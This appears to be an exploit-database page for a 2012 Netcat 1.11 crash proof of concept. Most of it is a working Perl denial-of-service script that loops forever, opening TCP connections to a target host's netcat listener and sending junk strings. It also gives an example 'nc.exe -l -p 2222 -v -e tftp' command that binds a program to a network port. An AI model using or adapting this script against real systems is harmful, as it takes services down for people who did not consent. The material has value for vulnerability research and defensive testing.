Netcat 1.11 Crash POC

2012.07.15
Credit: coolkaveh
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Netcat 1.11 Crash POC # crash:http://imageshack.us/photo/my-images/687/47003227.jpg/ # Date: July 13, 2012 # Author: coolkaveh # coolkaveh () rocketmail com # https://twitter.com/coolkaveh # Vendor Homepage: The NT version was written by Weld Pond <weld () vulnwatch org> # Version: 1.11 # Tested on: windows XP SP3 # set your netcat listening on port 222 with -e switch sftp or etc .. # example nc.exe -l -p 2222 -v -e tftp #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Crappy netcat Crash #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #!/usr/bin/perl -w use IO::Socket; $|=1; sub usage { print "nc.exe -l -p 2222 -v -e tftp"; print "by coolkaveh\n"; print "coolkaveh () rocketmail com\n"; print "usage: perl nc.pl <host> \n"; } $host=shift; $port=shift || "2222"; if(!defined($host)){ print "nc.exe -l -p 2222 -v -e tftp"; print "by coolkaveh\n"; print "coolkaveh () rocketmail com\n"; print "usage: perl nc.pl <host> \n"; exit(0); } @junk=('A'x100); print "Crashing NC !\n"; while (1) { COMMAND_LIST: foreach $cmd (@junk){ LABEL5: $sock1=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp', Timeout=>30); if(defined($sock1)){ $sock1->send("$cmd"." "."$poc\r\n", 0); } } }

References:

http://imageshack.us/photo/my-images/687/47003227.jpg/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top